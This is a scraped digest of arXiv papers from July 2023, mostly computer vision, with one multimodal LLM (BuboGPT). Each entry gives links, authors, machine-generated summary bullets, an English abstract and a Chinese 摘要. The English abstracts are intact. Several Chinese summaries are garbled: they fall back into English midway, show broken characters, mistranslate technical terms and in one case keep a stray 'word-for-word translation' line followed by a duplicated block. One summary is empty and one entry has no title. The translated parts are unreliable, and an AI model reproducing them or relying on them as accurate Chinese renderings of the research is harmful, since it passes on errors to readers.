paper_authors: Skylar Wolfgang Wurster, Tianyu Xiong, Han-Wei Shen, Hanqi Guo, Tom Peterka
for: 这篇论文是为了提出一种适应性的Scene Representation Networks（SRN），以便更好地压缩和可视化科学数据。methods: 该论文使用了多个空间自适应特征网格（APMGSRN），并提出了域分解训练和推理技术，以加速多GPU系统上的训练。results: 该论文提出的APMGSRN架构可以在不需要昂贵的八个树叶树、剪枝和搜索的情况下，提高SRN的重建精度。此外，论文还提供了一个开源的神经网络volume渲染应用程序，可以与任何PyTorch基于SRN进行插件式渲染。

Abstract
Scene representation networks (SRNs) have been recently proposed for compression and visualization of scientific data. However, state-of-the-art SRNs do not adapt the allocation of available network parameters to the complex features found in scientific data, leading to a loss in reconstruction quality. We address this shortcoming with an adaptively placed multi-grid SRN (APMGSRN) and propose a domain decomposition training and inference technique for accelerated parallel training on multi-GPU systems. We also release an open-source neural volume rendering application that allows plug-and-play rendering with any PyTorch-based SRN. Our proposed APMGSRN architecture uses multiple spatially adaptive feature grids that learn where to be placed within the domain to dynamically allocate more neural network resources where error is high in the volume, improving state-of-the-art reconstruction accuracy of SRNs for scientific data without requiring expensive octree refining, pruning, and traversal like previous adaptive models. In our domain decomposition approach for representing large-scale data, we train an set of APMGSRNs in parallel on separate bricks of the volume to reduce training time while avoiding overhead necessary for an out-of-core solution for volumes too large to fit in GPU memory. After training, the lightweight SRNs are used for realtime neural volume rendering in our open-source renderer, where arbitrary view angles and transfer functions can be explored. A copy of this paper, all code, all models used in our experiments, and all supplemental materials and videos are available at https://github.com/skywolf829/APMGSRN.

摘要
Scene representation networks (SRNs) 有最近提出用于压缩和可视化科学数据的方法。然而，当前的 SRNs 不会根据科学数据中复杂的特征进行分配可用的网络参数，导致重建质量下降。我们解决这个缺点，提出了适应地位的多格rid SRN (APMGSRN) 和多 GPU 系统上加速并行训练的领域分解训练和推理技术。我们还发布了基于 PyTorch 的开源神经体积渲染应用程序，允许任意的 PyTorch-based SRN 插件式渲染。我们的提议的 APMGSRN 架构使用多个空间自适应特征网格，学习在域内的位置，以动态分配更多神经网络资源，以提高 SRNs 的重建精度。在我们的域ode decomposition 方法中，我们在分解大规模数据时使用多个独立的块训练 APMGSRN，以降低训练时间，而不需要费时的 Octree 修正、剪辑和搜索。之后，我们使用轻量级 SRN 进行实时神经体积渲染，并且支持任意的视角和转换函数。详细的报告、所有代码、所有在实验中使用的模型、以及所有补充材料和视频都可以在 https://github.com/skywolf829/APMGSRN 上获取。

GastroVision: A Multi-class Endoscopy Image Dataset for Computer Aided Gastrointestinal Disease Detection

paper_url: http://arxiv.org/abs/2307.08140
repo_url: https://github.com/debeshjha/gastrovision
paper_authors: Debesh Jha, Vanshali Sharma, Neethi Dasu, Nikhil Kumar Tomar, Steven Hicks, M. K. Bhuyan, Pradip K. Das, Michael A. Riegler, Pål Halvorsen, Ulas Bagci, Thomas de Lange
For: 这个研究旨在提供一个大规模、精确标注的胃肠内镜数据集，以便用于胃肠疾病检测和分类的人工智能（AI）系统开发。* Methods: 这个研究使用了多中心开放存取的胃肠内镜数据集，包括不同的生物学特征、疾病症状、肿瘤除去 caso和正常发现（总共27个类别）。数据集包含8,000幅从挪威巴鲁姆医院和瑞典卡罗琳斯卡大学医院所取得的胃肠内镜图像，并由经验丰富的胃肠镜诊师进行了标注和验证。* Results: 研究人员验证了数据集的重要性，使用了具有普遍受欢迎的深度学习基eline模型进行了广泛的比较。他们认为这个数据集可以促进胃肠疾病检测和分类的AI系统开发。

Abstract
Integrating real-time artificial intelligence (AI) systems in clinical practices faces challenges such as scalability and acceptance. These challenges include data availability, biased outcomes, data quality, lack of transparency, and underperformance on unseen datasets from different distributions. The scarcity of large-scale, precisely labeled, and diverse datasets are the major challenge for clinical integration. This scarcity is also due to the legal restrictions and extensive manual efforts required for accurate annotations from clinicians. To address these challenges, we present \textit{GastroVision}, a multi-center open-access gastrointestinal (GI) endoscopy dataset that includes different anatomical landmarks, pathological abnormalities, polyp removal cases and normal findings (a total of 27 classes) from the GI tract. The dataset comprises 8,000 images acquired from B{\ae}rum Hospital in Norway and Karolinska University Hospital in Sweden and was annotated and verified by experienced GI endoscopists. Furthermore, we validate the significance of our dataset with extensive benchmarking based on the popular deep learning based baseline models. We believe our dataset can facilitate the development of AI-based algorithms for GI disease detection and classification. Our dataset is available at \url{https://osf.io/84e7f/}.

摘要
临床应用人工智能（AI）系统的整合面临着扩展性和接受性的挑战。这些挑战包括数据可用性、偏见结果、数据质量、不透明度和不同分布下的表现不佳。lack of large-scale, precisely labeled, and diverse datasets is the major challenge for clinical integration. This scarcity is also due to the legal restrictions and extensive manual efforts required for accurate annotations from clinicians. To address these challenges, we present \textit{GastroVision}, a multi-center open-access gastrointestinal (GI) endoscopy dataset that includes different anatomical landmarks, pathological abnormalities, polyp removal cases and normal findings (a total of 27 classes) from the GI tract. The dataset comprises 8,000 images acquired from B{\ae}rum Hospital in Norway and Karolinska University Hospital in Sweden and was annotated and verified by experienced GI endoscopists. Furthermore, we validate the significance of our dataset with extensive benchmarking based on the popular deep learning based baseline models. We believe our dataset can facilitate the development of AI-based algorithms for GI disease detection and classification. Our dataset is available at \url{https://osf.io/84e7f/}.Here's the word-for-word translation of the text into Simplified Chinese:临床应用人工智能（AI）系统的整合面临着扩展性和接受性的挑战。这些挑战包括数据可用性、偏见结果、数据质量、不透明度和不同分布下的表现不佳。lack of large-scale, precisely labeled, and diverse datasets is the major challenge for clinical integration. This scarcity is also due to the legal restrictions and extensive manual efforts required for accurate annotations from clinicians. To address these challenges, we present \textit{GastroVision}, a multi-center open-access gastrointestinal (GI) endoscopy dataset that includes different anatomical landmarks, pathological abnormalities, polyp removal cases and normal findings (a total of 27 classes) from the GI tract. The dataset comprises 8,000 images acquired from B{\ae}rum Hospital in Norway and Karolinska University Hospital in Sweden and was annotated and verified by experienced GI endoscopists. Furthermore, we validate the significance of our dataset with extensive benchmarking based on the popular deep learning based baseline models. We believe our dataset can facilitate the development of AI-based algorithms for GI disease detection and classification. Our dataset is available at \url{https://osf.io/84e7f/}.

Solving Inverse Problems with Latent Diffusion Models via Hard Data Consistency

paper_url: http://arxiv.org/abs/2307.08123
repo_url: None
paper_authors: Bowen Song, Soo Min Kwon, Zecheng Zhang, Xinyu Hu, Qing Qu, Liyue Shen
for: 解决 inverse problems 的泛化问题
methods: 使用 pre-trained latent diffusion models 和 hard data consistency 技术
results: 可以 reconstruction high-quality images, 比如 Linear and non-linear inverse problems 的解决方案

Abstract
Diffusion models have recently emerged as powerful generative priors for solving inverse problems. However, training diffusion models in the pixel space are both data intensive and computationally demanding, which restricts their applicability as priors in domains such as medical imaging. Latent diffusion models, which operate in a much lower-dimensional space, offer a solution to these challenges. Though, their direct application to solving inverse problems remains an unsolved technical challenge due to the nonlinearity of the encoder and decoder. To address this issue,we propose ReSample, an algorithm that solves general inverse problems with pre-trained latent diffusion models. Our algorithm incorporates data consistency by solving an optimization problem during the reverse sampling process, a concept that we term as hard data consistency. Upon solving this optimization problem, we propose a novel resampling scheme to map the measurement-consistent sample back onto the correct data manifold. Our approach offers both memory efficiency and considerable flexibility in the sense that (1) it can be readily adapted to various inverse problems using the same pre-trained model as it does not assume any fixed forward measurement operator during training, and (2) it can be generalized to different domains by simply fine-tuning the latent diffusion model with a minimal amount of data samples. Our empirical results on both linear and non-linear inverse problems demonstrate that our approach can reconstruct high-quality images even compared to state-of-the-art works that operate in the pixel space.

摘要
Diffusion models 已经在 solves inverse problems 中出现为强大的生成假设。然而，在像素空间中训练 diffusion models 是数据充足和计算挑战性的，这限制了它们在医学成像等领域的应用。 latent diffusion models 可以解决这些挑战，它们在低维度空间中运行。然而，它们的直接应用于解决 inverse problems 还是技术挑战，因为推导器和解码器都是非线性的。为解决这个问题，我们提出了 ReSample 算法，它可以解决一般的 inverse problems with pre-trained latent diffusion models。我们的算法包括数据一致性，通过解决反推问题时的优化问题，我们称之为 hard data consistency。在解决这个优化问题后，我们提出了一种新的抽样方案，用于将 measurement-consistent sample 映射回正确的数据拟合。我们的方法具有内存效率和可变性，它可以轻松适应不同的 inverse problems，并且可以通过简单地微调 latent diffusion model 来适应不同的领域。我们的实验结果表明，我们的方法可以重建高质量的图像，甚至比针对像素空间进行训练的现状技术更高效。

Domain Generalisation with Bidirectional Encoder Representations from Vision Transformers

paper_url: http://arxiv.org/abs/2307.08117
repo_url: https://github.com/sw-packages/d23c4b6afa05094a23071333bd230aceceec08117355003f5c0ea958e60c9c98
paper_authors: Hamza Riaz, Alan F. Smeaton
for: 这篇论文旨在应用领域普遍化（Domain Generalization）技术，将知识从来源领域（Source Domain）转移到未见领域（Target Domain），以扩展深度学习模型的应用范围。
methods: 这篇论文使用了视觉对映器（Vision Transformer）进行领域普遍化，并评估了四种不同的视觉对映器架构（ViT、LeViT、DeiT、BEIT）在对于不同的资料分布进行测试。
results: 根据结果显示，使用了bidirectional encoder representation from image transformers（BEIT）架构，在三个benchmark（PACS、Home-Office、DomainNet）上实现了显著的验证和测试准确率改善，并且在对于未见领域的测试中具有较好的表现。

Abstract
Domain generalisation involves pooling knowledge from source domain(s) into a single model that can generalise to unseen target domain(s). Recent research in domain generalisation has faced challenges when using deep learning models as they interact with data distributions which differ from those they are trained on. Here we perform domain generalisation on out-of-distribution (OOD) vision benchmarks using vision transformers. Initially we examine four vision transformer architectures namely ViT, LeViT, DeiT, and BEIT on out-of-distribution data. As the bidirectional encoder representation from image transformers (BEIT) architecture performs best, we use it in further experiments on three benchmarks PACS, Home-Office and DomainNet. Our results show significant improvements in validation and test accuracy and our implementation significantly overcomes gaps between within-distribution and OOD data.

摘要
域�总结是将来源域的知识汇集到一个可以总结目标域的模型中。Recent research in domain generalization has faced challenges when using deep learning models as they interact with data distributions that differ from those they are trained on. Here we perform domain generalization on out-of-distribution (OOD) vision benchmarks using vision transformers. Initially we examine four vision transformer architectures, namely ViT, LeViT, DeiT, and BEIT, on out-of-distribution data. As the bidirectional encoder representation from image transformers (BEIT) architecture performs best, we use it in further experiments on three benchmarks PACS, Home-Office, and DomainNet. Our results show significant improvements in validation and test accuracy, and our implementation significantly overcomes gaps between within-distribution and OOD data.

Polarization Multi-Image Synthesis with Birefringent Metasurfaces

paper_url: http://arxiv.org/abs/2307.08106
repo_url: https://github.com/deanhazineh/multi-image-synthesis
paper_authors: Dean Hazineh, Soon Wei Daniel Lim, Qi Guo, Federico Capasso, Todd Zickler
For: + The paper is written for the task of incoherent opto-electronic filtering, which is a new application of optical metasurfaces in computational imaging systems. + The paper aims to demonstrate a new system that uses a birefringent metasurface with a polarizer-mosaicked photosensor to capture four optically-coded measurements in a single exposure.* Methods: + The paper uses a birefringent metasurface with a polarizer-mosaicked photosensor to capture four optically-coded measurements in a single exposure. + The paper introduces a new form of gradient descent with a novel regularizer that encourages light efficiency and a high signal-to-noise ratio to find a metasurface that can realize a set of user-specified spatial filters.* Results: + The paper demonstrates several examples in simulation and with fabricated prototypes, including some with spatial filters that have prescribed variations with respect to depth and wavelength.Here is the answer in Simplified Chinese text:* For: + 这篇论文是为了实现不同的空间滤波器而设计的，这是计算成像系统中新的应用。 + 论文描述了一种使用具有 polarizer-mosaicked photosensor 的折射率元件，在单次曝光中捕获四个光学编码量。* Methods: + 论文使用具有折射率元件和 polarizer-mosaicked photosensor 的新方法来捕获四个光学编码量。 + 论文引入了一种新的梯度下降算法，该算法通过鼓励光效率和信号噪声比来找到一个实现用户指定的空间滤波器的元件。* Results: + 论文通过实验和制造的证明，展示了一些实现了用户指定的空间滤波器的例子，包括一些具有不同深度和波长的滤波器。

Abstract
Optical metasurfaces composed of precisely engineered nanostructures have gained significant attention for their ability to manipulate light and implement distinct functionalities based on the properties of the incident field. Computational imaging systems have started harnessing this capability to produce sets of coded measurements that benefit certain tasks when paired with digital post-processing. Inspired by these works, we introduce a new system that uses a birefringent metasurface with a polarizer-mosaicked photosensor to capture four optically-coded measurements in a single exposure. We apply this system to the task of incoherent opto-electronic filtering, where digital spatial-filtering operations are replaced by simpler, per-pixel sums across the four polarization channels, independent of the spatial filter size. In contrast to previous work on incoherent opto-electronic filtering that can realize only one spatial filter, our approach can realize a continuous family of filters from a single capture, with filters being selected from the family by adjusting the post-capture digital summation weights. To find a metasurface that can realize a set of user-specified spatial filters, we introduce a form of gradient descent with a novel regularizer that encourages light efficiency and a high signal-to-noise ratio. We demonstrate several examples in simulation and with fabricated prototypes, including some with spatial filters that have prescribed variations with respect to depth and wavelength. Visit the Project Page at https://deanhazineh.github.io/publications/Multi_Image_Synthesis/MIS_Home.html

摘要
依据精心设计的奈米结构，光学元面 composites 已经吸引了广泛关注，因为它们可以 manipulate 光子并实现基于入射场的特性而具有不同的功能性。计算成像系统已经开始利用这种能力生成具有特定任务需求的编码测量集，并通过数字后处理来实现。我们基于这些工作，引入了一种新的系统，使用偏振元面和分割成多个极化通道的探测器来在单个曝光中捕捉四个光学编码测量。我们应用这种系统于不同激光的吸收过滤器任务中，取代了传统的数字空间滤波操作，并且可以实现连续的家族filters，从单个捕捉中选择filters。为找到实现用户指定的空间滤波的元面，我们引入了一种新的迭代 descent 算法，其中包含了光效率和信号噪声比的新正则化项。我们在 simulate 和实验中示出了许多示例，包括一些具有深度和波长的特定变化的空间滤波。更多信息请参考

FourierHandFlow: Neural 4D Hand Representation Using Fourier Query Flow

paper_url: http://arxiv.org/abs/2307.08100
repo_url: None
paper_authors: Jihyun Lee, Junbong Jang, Donghwan Kim, Minhyuk Sung, Tae-Kyun Kim
for: 本研究旨在学习RGB视频中的人手四维形态，以实现高效精准的人手重建和动作估计。
methods: 本方法使用Fourier série来表示 Query Flow，并将3D占据场与动作相关的Query Flow组合起来，以实现四维形态的精准重建。
results: 在实验中，本方法可以实现 estado-of-the-art 的Result on video-based 4D reconstruction，同时 computationally more efficient than existing 3D/4D implicit shape representations。 Additionally, the learned correspondences of implicit shapes can be used for motion inter- and extrapolation and texture transfer.

Abstract
Recent 4D shape representations model continuous temporal evolution of implicit shapes by (1) learning query flows without leveraging shape and articulation priors or (2) decoding shape occupancies separately for each time value. Thus, they do not effectively capture implicit correspondences between articulated shapes or regularize jittery temporal deformations. In this work, we present FourierHandFlow, which is a spatio-temporally continuous representation for human hands that combines a 3D occupancy field with articulation-aware query flows represented as Fourier series. Given an input RGB sequence, we aim to learn a fixed number of Fourier coefficients for each query flow to guarantee smooth and continuous temporal shape dynamics. To effectively model spatio-temporal deformations of articulated hands, we compose our 4D representation based on two types of Fourier query flow: (1) pose flow that models query dynamics influenced by hand articulation changes via implicit linear blend skinning and (2) shape flow that models query-wise displacement flow. In the experiments, our method achieves state-of-the-art results on video-based 4D reconstruction while being computationally more efficient than the existing 3D/4D implicit shape representations. We additionally show our results on motion inter- and extrapolation and texture transfer using the learned correspondences of implicit shapes. To the best of our knowledge, FourierHandFlow is the first neural 4D continuous hand representation learned from RGB videos. The code will be publicly accessible.

摘要
最近的4D形态表示模型连续时间演化的隐式形态 by (1) 学习无关形态和肢体约束的查询流或 (2) 分解每个时间值的形态占用。因此，它们不能有效地捕捉隐式相关性 между 动体形态或正则化颤动幅。在这种工作中，我们提出了FourierHandFlow，它是一种包含3D占用场和形态相关的查询流 Fourier系列的四维表示。给输入的RGB序列，我们希望学习固定数量的Fourier系数来保证平滑和连续的时间形态动态。为了有效地模型动体形态的空间时间变换，我们将我们的4D表示分为两种类型的查询流：（1）pose流，它模型查询动态受到手肢变化的影响via隐式线性混合皮肤和（2）形态流，它模型查询点 wise的移动流。在实验中，我们的方法实现了视频基于4D重建的状态对齐的结果，而且与现有的3D/4D隐式形态表示更加计算效率。我们还展示了使用学习的隐式形态对应关系进行动作间隔和外部逼近，以及纹理传输。根据我们所知，FourierHandFlow是首次由RGB视频学习的神经网络4D连续手表示。代码将公开访问。

paper_url: http://arxiv.org/abs/2307.08098
repo_url: https://github.com/pjlallen/calibnet
paper_authors: Jialun Pei, Tao Jiang, He Tang, Nian Liu, Yueming Jin, Deng-Ping Fan, Pheng-Ann Heng
for: 这个论文主要针对RGB-D图像中的精度实例分割问题，提出了一种基于双树 Cross-Modal Feature Calibration Architecture（CalibNet）的新方法。
methods: 该方法使用了三个简单模块：动态交互卷积（DIK）、重量共享 fusión（WSF）和深度相似度评估（DSA），这三个模块共同工作以生成有效的实例相关卷积和融合cross-modal特征。
results: 对于三个挑战性评价标准，该方法实现了出色的结果，即COME15K-N测试集上的AP为58.0%，比替代方案更高。

Abstract
We propose a novel approach for RGB-D salient instance segmentation using a dual-branch cross-modal feature calibration architecture called CalibNet. Our method simultaneously calibrates depth and RGB features in the kernel and mask branches to generate instance-aware kernels and mask features. CalibNet consists of three simple modules, a dynamic interactive kernel (DIK) and a weight-sharing fusion (WSF), which work together to generate effective instance-aware kernels and integrate cross-modal features. To improve the quality of depth features, we incorporate a depth similarity assessment (DSA) module prior to DIK and WSF. In addition, we further contribute a new DSIS dataset, which contains 1,940 images with elaborate instance-level annotations. Extensive experiments on three challenging benchmarks show that CalibNet yields a promising result, i.e., 58.0% AP with 320*480 input size on the COME15K-N test set, which significantly surpasses the alternative frameworks. Our code and dataset are available at: https://github.com/PJLallen/CalibNet.

摘要
我们提出了一种新的RGB-D突出实例分割方法，基于双极分支交叉模式特征均衡架构，即CalibNet。我们的方法同时均衡了深度和RGB特征在核心和面罩分支中，以生成实例相关的核心和面罩特征。CalibNet由三个简单模块组成：动态互动核心（DIK）、重量共享融合（WSF）以及深度相似评估（DSA）模块。这些模块共同工作，以生成有效的实例相关核心和融合交叉特征。此外，我们还提供了一个新的DSIS数据集，包含1940张图像，每张图像均有详细的实例级别注解。我们的实验表明，CalibNet在三个挑战性的benchmark上实现了优秀的结果，即COME15K-N测试集上的58.0% AP值，与其他框架相比有显著提高。我们的代码和数据集可以在：https://github.com/PJLallen/CalibNet上获取。

Semi-DETR: Semi-Supervised Object Detection with Detection Transformers

paper_url: http://arxiv.org/abs/2307.08095
repo_url: https://github.com/PaddlePaddle/PaddleDetection/tree/develop/configs/semi_det/semi_detr
paper_authors: Jiacheng Zhang, Xiangru Lin, Wei Zhang, Kuo Wang, Xiao Tan, Junyu Han, Errui Ding, Jingdong Wang, Guanbin Li
for: semi-supervised object detection (SSOD)
methods: DETR-based framework with Stage-wise Hybrid Matching strategy and Crossview Query Consistency method
results: outperforms all state-of-the-art methods by clear margins on all SSOD settings of both COCO and Pascal VOC benchmark datasets.Here is the Chinese translation of the three key information points:
for: semi-supervised物体检测 (SSOD)
methods: DETR基于的框架，具有Stage-wise Hybrid Matching策略和 Crossview Query Consistency方法
results: 在所有 SSOD 设定下，包括 COCO 和 Pascal VOC 数据集的所有 benchmark 数据集上，与所有现有方法均以明显的差距超越。

Abstract
We analyze the DETR-based framework on semi-supervised object detection (SSOD) and observe that (1) the one-to-one assignment strategy generates incorrect matching when the pseudo ground-truth bounding box is inaccurate, leading to training inefficiency; (2) DETR-based detectors lack deterministic correspondence between the input query and its prediction output, which hinders the applicability of the consistency-based regularization widely used in current SSOD methods. We present Semi-DETR, the first transformer-based end-to-end semi-supervised object detector, to tackle these problems. Specifically, we propose a Stage-wise Hybrid Matching strategy that combines the one-to-many assignment and one-to-one assignment strategies to improve the training efficiency of the first stage and thus provide high-quality pseudo labels for the training of the second stage. Besides, we introduce a Crossview Query Consistency method to learn the semantic feature invariance of object queries from different views while avoiding the need to find deterministic query correspondence. Furthermore, we propose a Cost-based Pseudo Label Mining module to dynamically mine more pseudo boxes based on the matching cost of pseudo ground truth bounding boxes for consistency training. Extensive experiments on all SSOD settings of both COCO and Pascal VOC benchmark datasets show that our Semi-DETR method outperforms all state-of-the-art methods by clear margins. The PaddlePaddle version code1 is at https://github.com/PaddlePaddle/PaddleDetection/tree/develop/configs/semi_det/semi_detr.

摘要
我们分析基于DETR的框架在半指导下的物体检测（SSOD）中，发现了两个问题：（1）一对一对应策略可能导致训练不精确，因为伪真的 bounding box 精度不高；（2）基于DETR的检测器缺乏对输入查询与其预测输出之间的决定性对匹配，这限制了现有的一般SSOD方法中的一致性基础训练的应用。我们提出了半DETR，第一个基于transformer的端到端半指导物体检测器，以解决这些问题。具体来说，我们提出了阶段匹配策略，让一个查询与多个预测结果之间进行匹配，从而提高了训练的效率，并且为第二阶段的训练提供高质量的伪标签。此外，我们引入了跨观查询内容一致性方法，以学习查询从不同观点的物体特征内在性，而不需要寻找决定性的查询匹配。最后，我们提出了一个基于成本的伪标签采矿模组，以动态地采矿更多的伪标签，以便实现一致性训练。实验结果显示，我们的半DETR方法在所有SSOD设定下，都比所有现有方法优化了明显。PaddlePaddle版本代码可以在以下链接中找到：https://github.com/PaddlePaddle/PaddleDetection/tree/develop/configs/semi_det/semi_detr。

Cross-Ray Neural Radiance Fields for Novel-view Synthesis from Unconstrained Image Collections

paper_url: http://arxiv.org/abs/2307.08093
repo_url: https://github.com/yifyang993/cr-nerf-pytorch
paper_authors: Yifan Yang, Shuhai Zhang, Zixiong Huang, Yubing Zhang, Mingkui Tan
for: 用于Synthesizing occlusion-free novel views from unconstrained image collections, addressing challenges such as dynamic changes in appearance and transient objects.
methods: 使用Cross-Ray NeRF (CR-NeRF)方法，利用多个ray的交互信息来模型变化的外观，并通过图像特征covariance和图像外观的统计方式来recover外观。此外，还提出了适应物体排除和网格采样策略来避免 occlusion 问题。
results: 经过广泛的实验 validate CR-NeRF 的有效性，能够Synthesize high-quality novel views with the same appearances as the input images, even in the presence of dynamic changes and transient objects.

Abstract
Neural Radiance Fields (NeRF) is a revolutionary approach for rendering scenes by sampling a single ray per pixel and it has demonstrated impressive capabilities in novel-view synthesis from static scene images. However, in practice, we usually need to recover NeRF from unconstrained image collections, which poses two challenges: 1) the images often have dynamic changes in appearance because of different capturing time and camera settings; 2) the images may contain transient objects such as humans and cars, leading to occlusion and ghosting artifacts. Conventional approaches seek to address these challenges by locally utilizing a single ray to synthesize a color of a pixel. In contrast, humans typically perceive appearance and objects by globally utilizing information across multiple pixels. To mimic the perception process of humans, in this paper, we propose Cross-Ray NeRF (CR-NeRF) that leverages interactive information across multiple rays to synthesize occlusion-free novel views with the same appearances as the images. Specifically, to model varying appearances, we first propose to represent multiple rays with a novel cross-ray feature and then recover the appearance by fusing global statistics, i.e., feature covariance of the rays and the image appearance. Moreover, to avoid occlusion introduced by transient objects, we propose a transient objects handler and introduce a grid sampling strategy for masking out the transient objects. We theoretically find that leveraging correlation across multiple rays promotes capturing more global information. Moreover, extensive experimental results on large real-world datasets verify the effectiveness of CR-NeRF.

摘要
neural radiance fields (nerf) 是一种革命性的方法，通过每个像素只采样一个光线来渲染场景，并在不同视图 synthesis 中显示出优异的能力。然而，在实际应用中，我们通常需要从无结构图像集中恢复 nerf，这两个挑战：1）图像经常具有不同拍摄时间和摄像机设置导致的变化的外观; 2）图像可能包含过渡性的对象，如人和车辆，导致干扰和幻影 artifacts。传统的方法通过地方使用单个光线来synthesize 一个像素的颜色来解决这些挑战。与人类的感知过程不同，我们在这篇论文中提出了跨光线 nerf (cr-nerf)，它利用多个光线之间的互动信息来synthesize 干扰和幻影 artifacts 自由的新视图，同时保持与图像的外观一致。为了模型不同的外观，我们首先提出了一种新的跨光线特征表示，然后通过拼接全局统计，即光线特征相关矩阵和图像外观，来回归出现在图像中的外观。此外，我们还提出了一种过渡性对象处理器，并引入了网格采样策略，以masking 出过渡性对象。我们理论上发现，通过多个光线之间的互动信息，可以更好地捕捉全局信息。此外，我们在大量实际数据上进行了广泛的实验，并证明了cr-nerf的效果。

Gait Data Augmentation using Physics-Based Biomechanical Simulation

paper_url: http://arxiv.org/abs/2307.08092
repo_url: None
paper_authors: Mritula Chandrasekaran, Jarek Francik, Dimitrios Makris
for: Addressing the problem of data scarcity for gait analysis
methods: Using OpenSIM, a physics-based simulator, to synthesize biomechanically plausible walking sequences for gait data augmentation
results: Improved performance of model-based gait classifiers and state-of-the-art results for gait-based person identification with an accuracy of up to 96.11% on the CASIA-B dataset.Here’s the full Chinese text:
for: solves the problem of gait analysis data scarcity
methods: 使用OpenSIM，一个基于物理的 simulator，Synthesize biomechanically plausible walking sequences for gait data augmentation
results: 提高基于模型的步行分类器的性能，并在CASIA-B dataset上实现了人体步行识别的最佳结果，准确率高达96.11%。

Abstract
This paper focuses on addressing the problem of data scarcity for gait analysis. Standard augmentation methods may produce gait sequences that are not consistent with the biomechanical constraints of human walking. To address this issue, we propose a novel framework for gait data augmentation by using OpenSIM, a physics-based simulator, to synthesize biomechanically plausible walking sequences. The proposed approach is validated by augmenting the WBDS and CASIA-B datasets and then training gait-based classifiers for 3D gender gait classification and 2D gait person identification respectively. Experimental results indicate that our augmentation approach can improve the performance of model-based gait classifiers and deliver state-of-the-art results for gait-based person identification with an accuracy of up to 96.11% on the CASIA-B dataset.

摘要

Untrained neural network embedded Fourier phase retrieval from few measurements

paper_url: http://arxiv.org/abs/2307.08717
repo_url: https://github.com/liyuan-2000/trad
paper_authors: Liyuan Ma, Hongxia Wang, Ningyi Leng, Ziyang Yuan
for: 这篇论文目的是解决快速干扰分析（FPR）问题，即从傅里叶频谱测量获得未知信号的重建问题。
methods: 该论文提出了一种基于替换方向方法的多分量加速器（ADMM）框架的无学习神经网络（NN）嵌入算法，用于解决FPR问题。该算法使用生成网络来表示要重建的图像，从而限制图像在网络结构中的空间。此外，该算法还添加了总变量（TV）正则化，以便更好地恢复图像中的本地结构。
results: 实验结果表明，提出的算法在计算资源更少的情况下，能够超越现有的无学习NN基于算法，甚至与有学习NN基于算法相比表现竞争力强。

Abstract
Fourier phase retrieval (FPR) is a challenging task widely used in various applications. It involves recovering an unknown signal from its Fourier phaseless measurements. FPR with few measurements is important for reducing time and hardware costs, but it suffers from serious ill-posedness. Recently, untrained neural networks have offered new approaches by introducing learned priors to alleviate the ill-posedness without requiring any external data. However, they may not be ideal for reconstructing fine details in images and can be computationally expensive. This paper proposes an untrained neural network (NN) embedded algorithm based on the alternating direction method of multipliers (ADMM) framework to solve FPR with few measurements. Specifically, we use a generative network to represent the image to be recovered, which confines the image to the space defined by the network structure. To improve the ability to represent high-frequency information, total variation (TV) regularization is imposed to facilitate the recovery of local structures in the image. Furthermore, to reduce the computational cost mainly caused by the parameter updates of the untrained NN, we develop an accelerated algorithm that adaptively trades off between explicit and implicit regularization. Experimental results indicate that the proposed algorithm outperforms existing untrained NN-based algorithms with fewer computational resources and even performs competitively against trained NN-based algorithms.

摘要
傅里叶阶段恢复（FPR）是一个广泛应用的挑战任务，它的目标是从傅里叶无法测量中恢复未知的信号。FPR WITH few measurements 是一个重要的应用，可以降低时间和硬件成本，但它受到严重的非uniqueness问题的困扰。最近，未训练的神经网络（NN）已经提供了新的approaches，它们通过引入学习的约束来缓解非uniqueness问题，不需要任何外部数据。然而，它们可能不适合重建图像中的细节。这篇论文提出了一种基于 alternating direction method of multipliers（ADMM）框架的未训练NN算法来解决FPR WITH few measurements。 Specifically, we use a generative network to represent the image to be recovered, which confines the image to the space defined by the network structure。 To improve the ability to represent high-frequency information, total variation（TV）正则化是应用于促进图像中的地方结构的恢复。更over, to reduce the computational cost mainly caused by the parameter updates of the untrained NN, we develop an accelerated algorithm that adaptively trades off between explicit and implicit regularization。实验结果表明，提出的算法在计算资源更少的情况下表现出了更好的性能，甚至与训练NN-based algorithm相当竞争。

2023-07-17

cs.AI

cs.AI - 2023-07-17

paper_url: http://arxiv.org/abs/2307.08581
repo_url: https://github.com/magic-research/bubogpt
paper_authors: Yang Zhao, Zhijie Lin, Daquan Zhou, Zilong Huang, Jiashi Feng, Bingyi Kang
for: 这paper的目的是提出一种多模态LLM，可以在语言、视觉和声音三种模式之间进行交互，并提供细化的对象位置理解。
methods: 这paper使用了一种基于SAM的视觉定位模块，以及一种两个阶段训练方案和指令集来授命多模态理解。
results: 实验表明，BuboGPT在与人类交互时表现出了卓越的多模态理解和视觉定位能力，并在不同的模式组合（有Alignment和无Alignment）下表现consistently well。

Abstract
LLMs have demonstrated remarkable abilities at interacting with humans through language, especially with the usage of instruction-following data. Recent advancements in LLMs, such as MiniGPT-4, LLaVA, and X-LLM, further enlarge their abilities by incorporating multi-modal inputs, including image, video, and speech. Despite their effectiveness at generating precise and detailed language understanding of the given modality signal, these LLMs give up the ability to ground specific parts of inputs, thus only constructing a coarse-grained mapping. However, explicit and informative correspondence between text and other modalities will not only improve the user experience but also help to expand the application scenario of multi-modal LLMs. Therefore, we propose BuboGPT, a multi-modal LLM with visual grounding that can perform cross-modal interaction between vision, audio and language, providing fine-grained understanding of visual objects and other given modalities. As a result, BuboGPT is able to point out the specific location of an object in the image, when it is generating response or description for that object. Our contributions are two-fold: 1) An off-the-shelf visual grounding module based on SAM that extracts entities in a sentence and find corresponding masks in the image. 2) A two-stage training scheme and instruction dataset to endow joint text-image-audio understanding. Our experiments show that BuboGPT achieves impressive multi-modality understanding and visual grounding abilities during the interaction with human. It performs consistently well when provided by arbitrary modality combinations (either aligned or unaligned). Our code, model and dataset are available at https://bubo-gpt.github.io .

摘要
